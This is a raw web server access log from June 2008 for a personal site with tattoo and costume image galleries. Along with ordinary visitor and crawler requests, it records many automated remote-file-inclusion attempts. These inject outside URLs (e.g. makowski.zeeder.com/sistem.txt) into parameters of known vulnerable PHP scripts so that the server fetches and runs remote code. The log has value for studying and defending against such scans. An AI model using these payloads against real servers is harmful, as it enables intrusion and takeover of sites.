124.87.2.228 - - [12/Jun/2008:08:32:13 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:13 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:23 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:23 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:23 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:23 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:32 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:32 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:32 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:32 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:32 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:32 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:32 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:33 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:33 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:33 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
124.87.2.228 - - [12/Jun/2008:08:32:33 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
66.98.224.22 - - [12/Jun/2008:08:34:24 -0500] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
66.98.224.22 - - [12/Jun/2008:08:34:24 -0500] "GET //bbs/skin/zero_vote/setup.php?dir=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
200.30.73.117 - - [12/Jun/2008:08:35:38 -0500] "GET /logs/access_log.1204156800%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1204156800%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1204156800&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E...%201179619200%20HTTP/1.0%22%20200%20120858%20%22http:/tomdolan.pconline.com/logs/%22%22zermelo%20...%20.com/logs/%22%22zermelo%20Mozilla/5.0%20compatible;%20heritrix/1.12.1%20(+http:/www.%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1204156800%3C/span%3E%20-%20%3Cem%3E423k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r23%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu9eqHVFIkgoB4SVXNyoA;_ylu=X3oDMTB0dGM2MGxvBHNlYwNzcgRwb3MDOTIzBGNvbG8DYWMyBHZ0aWQD/SIG=12ojnas49/EXP=1213361962/**http%3a/www.pantymad.com/stats/awstats/awstats022008.pantymad.com.txt//Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 469 "-""libwww-perl/5.803"
200.30.73.117 - - [12/Jun/2008:08:35:39 -0500] "GET //Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
200.30.73.117 - - [12/Jun/2008:08:35:39 -0500] "GET /logs/access_log.1204156800%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1204156800%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1204156800&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E...%201179619200%20HTTP/1.0%22%20200%20120858%20%22http:/tomdolan.pconline.com/logs/%22%22zermelo%20...%20.com/logs/%22%22zermelo%20Mozilla/5.0%20compatible;%20heritrix/1.12.1%20(+http:/www.%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1204156800%3C/span%3E%20-%20%3Cem%3E423k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r23%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu9eqHVFIkgoB4SVXNyoA;_ylu=X3oDMTB0dGM2MGxvBHNlYwNzcgRwb3MDOTIzBGNvbG8DYWMyBHZ0aWQD/SIG=12ojnas49/EXP=1213361962/**http%3a/www.pantymad.com/stats/awstats//Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 469 "-""libwww-perl/5.803"
200.30.73.117 - - [12/Jun/2008:08:36:06 -0500] "GET /logs/access_log.1208649600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1208649600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1208649600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3EHTTP/1.1%22%20404%20299%20%22-%22%22libwww-perl/5.79%22%2072.3.232.30%20-%20-%20[19/Apr%20...%2000:41%20-0500]%20%22GET%20/logs/Neos_Chronos/header.php?base_folder=http:/medisana.co.kr/test?%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1208649600%3C/span%3E%20-%20%3Cem%3E131k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r42%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu9eqHVFIkgoB9CVXNyoA;_ylu=X3oDMTB0ZDBwOW1sBHNlYwNzcgRwb3MDOTQyBGNvbG8DYWMyBHZ0aWQD/SIG=129723kdb/EXP=1213361962/**http%3a/extramsg.com/albums/album452/bot%25202k3.phtml//Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 469 "-""libwww-perl/5.803"
200.30.73.117 - - [12/Jun/2008:08:36:06 -0500] "GET /logs/access_log.1208649600%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1208649600%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1208649600&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3EHTTP/1.1%22%20404%20299%20%22-%22%22libwww-perl/5.79%22%2072.3.232.30%20-%20-%20[19/Apr%20...%2000:41%20-0500]%20%22GET%20/logs/Neos_Chronos/header.php?base_folder=http:/medisana.co.kr/test?%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1208649600%3C/span%3E%20-%20%3Cem%3E131k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r42%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu9eqHVFIkgoB9CVXNyoA;_ylu=X3oDMTB0ZDBwOW1sBHNlYwNzcgRwb3MDOTQyBGNvbG8DYWMyBHZ0aWQD/SIG=129723kdb/EXP=1213361962/**http%3a/extramsg.com/albums/album452//Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 469 "-""libwww-perl/5.803"
66.135.32.79 - - [12/Jun/2008:08:36:52 -0500] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
66.135.32.79 - - [12/Jun/2008:08:36:52 -0500] "GET //bbs/skin/zero_vote/setup.php?dir=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
74.6.22.89 - - [12/Jun/2008:08:38:39 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2214 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.149.241.207 - - [12/Jun/2008:08:42:14 -0500] "GET /logs//mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.811"
89.149.241.207 - - [12/Jun/2008:08:42:20 -0500] "GET //mcf.php?content=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.811"
83.223.116.60 - - [12/Jun/2008:08:44:53 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://trendbiz.ro/user_media/logo/images/bid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
83.223.116.60 - - [12/Jun/2008:08:44:54 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://trendbiz.ro/user_media/logo/images/bid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
66.98.224.22 - - [12/Jun/2008:08:51:41 -0500] "GET /logs/access_log.1208649600//bbs/skin/zero_vote/setup.php?dir=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
66.98.224.22 - - [12/Jun/2008:08:51:41 -0500] "GET //bbs/skin/zero_vote/setup.php?dir=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
66.98.224.22 - - [12/Jun/2008:08:51:41 -0500] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
66.98.224.22 - - [12/Jun/2008:08:51:49 -0500] "GET /logs/access_log.1204156800//bbs/skin/zero_vote/setup.php?dir=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
77.55.90.2 - - [12/Jun/2008:08:56:55 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.macnews.com.br/noticias/nucleus/images/globe-right.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.64"
77.55.90.2 - - [12/Jun/2008:08:56:56 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.macnews.com.br/noticias/nucleus/images/globe-right.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.64"
194.112.190.5 - - [12/Jun/2008:09:02:10 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
194.112.190.5 - - [12/Jun/2008:09:02:11 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
74.6.22.89 - - [12/Jun/2008:09:08:25 -0500] "GET /logs/access_log.1195603200 HTTP/1.0" 200 270970 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.128.131.80 - - [12/Jun/2008:09:09:57 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
62.128.131.80 - - [12/Jun/2008:09:09:58 -0500] "GET /convert/mvcw.php?vwar_root=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
85.18.136.82 - - [12/Jun/2008:09:10:17 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1) Gecko/20061010 Firefox/2.0"
85.18.136.82 - - [12/Jun/2008:09:10:18 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1) Gecko/20061010 Firefox/2.0"
85.18.136.82 - - [12/Jun/2008:09:10:18 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.8.1) Gecko/20061010 Firefox/2.0"
74.6.22.89 - - [12/Jun/2008:09:21:20 -0500] "GET /logs/access_log.1207008000 HTTP/1.0" 200 373280 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.82.99.126 - - [12/Jun/2008:09:22:43 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
195.82.99.126 - - [12/Jun/2008:09:22:43 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
200.30.73.117 - - [12/Jun/2008:09:23:28 -0500] "GET /logs/access_log.1204156800//Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
200.30.73.117 - - [12/Jun/2008:09:23:28 -0500] "GET //Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
200.30.73.117 - - [12/Jun/2008:09:23:29 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
200.30.73.117 - - [12/Jun/2008:09:23:29 -0500] "GET /logs/access_log.1208649600//Neos_Chronos/header.php?base_folder=http://makowski.zeeder.com/sistem.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
87.106.28.93 - - [12/Jun/2008:09:29:24 -0500] "GET /logs/index.php?headfoot=yes&path[docroot]=http://eb.net.my/tukangadmin/components/com_sections/kan.tut?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.28.93 - - [12/Jun/2008:09:29:25 -0500] "GET /index.php?headfoot=yes&path[docroot]=http://eb.net.my/tukangadmin/components/com_sections/kan.tut?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
204.152.239.219 - - [12/Jun/2008:09:31:29 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://www.google.com/search?gbv=2&hl=en&q=vintage+tattoo&start=10&sa=N""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
204.152.239.219 - - [12/Jun/2008:09:31:30 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:30 -0500] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:33 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat10.JPG HTTP/1.0" 200 22746 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat1.JPG HTTP/1.0" 200 16158 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat9.JPG HTTP/1.0" 200 16749 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat6.JPG HTTP/1.0" 200 18543 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat5.JPG HTTP/1.0" 200 13769 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat7.JPG HTTP/1.0" 200 17358 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat8.jpg HTTP/1.0" 200 13191 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat3.jpg HTTP/1.0" 200 11901 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat4.JPG HTTP/1.0" 200 18080 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:34 -0500] "GET /tattoo/tat2.JPG HTTP/1.0" 200 18943 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/set2.htm HTTP/1.0" 200 2378 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb1.JPG HTTP/1.0" 200 14848 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb2.JPG HTTP/1.0" 200 16592 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb4.JPG HTTP/1.0" 200 15705 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb5.JPG HTTP/1.0" 200 20135 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb10.JPG HTTP/1.0" 200 17887 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb7.JPG HTTP/1.0" 200 16193 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb3.JPG HTTP/1.0" 200 16163 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb8.JPG HTTP/1.0" 200 18467 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb9.JPG HTTP/1.0" 200 21598 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:45 -0500] "GET /tattoo/tatb6.JPG HTTP/1.0" 200 21190 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/set3.htm HTTP/1.0" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc7.JPG HTTP/1.0" 200 12347 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc1.JPG HTTP/1.0" 200 21412 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc10.JPG HTTP/1.0" 200 14157 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc3.JPG HTTP/1.0" 200 16313 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc9.JPG HTTP/1.0" 200 18139 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc2.JPG HTTP/1.0" 200 17893 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc8.JPG HTTP/1.0" 200 17057 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc5.JPG HTTP/1.0" 200 19436 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc4.JPG HTTP/1.0" 200 12619 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:31:52 -0500] "GET /tattoo/tatc6.JPG HTTP/1.0" 200 14549 "-""Mozilla/4.0 (compatible;)"
61.9.184.228 - - [12/Jun/2008:09:31:54 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://blog.me.lit.edu.tw/adu/special.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
61.9.184.228 - - [12/Jun/2008:09:31:55 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://blog.me.lit.edu.tw/adu/special.txt???? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd1.JPG HTTP/1.0" 200 14507 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd2.JPG HTTP/1.0" 200 14891 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd9.JPG HTTP/1.0" 200 17368 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/msameric.JPG HTTP/1.0" 200 14283 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd3.JPG HTTP/1.0" 200 12386 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd8.JPG HTTP/1.0" 200 13038 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd7.JPG HTTP/1.0" 200 20479 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd4.JPG HTTP/1.0" 200 12068 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd6.JPG HTTP/1.0" 200 12059 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:00 -0500] "GET /tattoo/tatd10.JPG HTTP/1.0" 200 19089 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:08 -0500] "GET /tattoo/bonus.htm HTTP/1.0" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
204.152.239.219 - - [12/Jun/2008:09:32:08 -0500] "GET /tattoo/tate2.JPG HTTP/1.0" 200 13891 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:08 -0500] "GET /tattoo/tate4.JPG HTTP/1.0" 200 18555 "-""Mozilla/4.0 (compatible;)"
204.152.239.219 - - [12/Jun/2008:09:32:08 -0500] "GET /tattoo/tate3.JPG HTTP/1.0" 200 16409 "-""Mozilla/4.0 (compatible;)"
89.122.90.39 - - [12/Jun/2008:09:35:33 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
89.122.90.39 - - [12/Jun/2008:09:35:37 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
89.122.90.39 - - [12/Jun/2008:09:35:37 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
89.122.90.39 - - [12/Jun/2008:09:35:38 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
89.122.90.39 - - [12/Jun/2008:09:35:38 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
